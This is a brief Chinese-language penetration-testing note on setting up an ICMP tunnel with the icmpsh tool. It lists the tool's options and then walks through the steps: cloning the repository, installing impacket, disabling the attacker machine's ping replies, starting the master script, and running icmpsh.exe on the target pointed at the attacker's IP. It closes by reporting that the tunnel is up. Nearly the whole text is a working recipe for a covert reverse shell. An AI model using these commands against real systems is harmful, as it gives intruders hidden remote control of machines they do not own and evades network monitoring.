内网渗透_建立icmp隧道
-t host :要向其发送ping请求的主机ip地址。此选项是必需的!
-r:发送一个包含字符串“Test1234”的测试icmp请求,然后退出。这是用来测试连接的。
-d milliseconds:请求之间的延迟(毫秒)
-o milliseconds:毫秒响应超时(毫秒)。如果没有及时收到回复,奴隶将增加一个空白计数器。如果计数器达到某个限制,则从机将退出。如果收到响应,计数器将被设置回0。
-b num :空白数限制(退出前未应答的icmp请求
-s bytes :最大数据缓冲区大小(字节)
git clone https://github.com/inquisb/icmpsh.git
apt-get install python-impacket
将本机ping的命令交给icmpsh,弄完记得设置回来,把1改成0
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python icmpsh_m.py 攻击机ip 目标靶机ip
icmpsh.exe -t 攻击机ip -d 500 -b 30 -s 128
隧道建立成功